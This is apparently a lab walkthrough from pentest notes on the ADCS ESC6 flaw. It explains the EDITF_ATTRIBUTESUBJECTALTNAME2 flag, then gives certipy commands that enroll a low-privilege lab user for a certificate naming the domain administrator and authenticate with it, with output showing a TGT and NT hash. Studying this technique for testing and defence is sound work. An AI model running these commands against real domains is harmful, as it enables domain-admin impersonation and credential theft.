ADCS - ESC6

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a CQure Academy post, involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this Keyfactor post describes, this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.

  • As said on certipy page : “ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. This flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration.”

  • Because MARYLAND-CA is vulnerable to ESC6 we can do the ESC1 attack but with the user template instead of the ESC1 template even if the user template got Enrollee Supplies Subject set to false.

Find the Vulnerability

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template User -ca MARYLAND-CA -upn administrator@maryland.local
certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@maryland.local': aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da

Dump it ntds with CME

PreviousADCS - ESC4NextCertifried - CVE-2022–26923

Last updated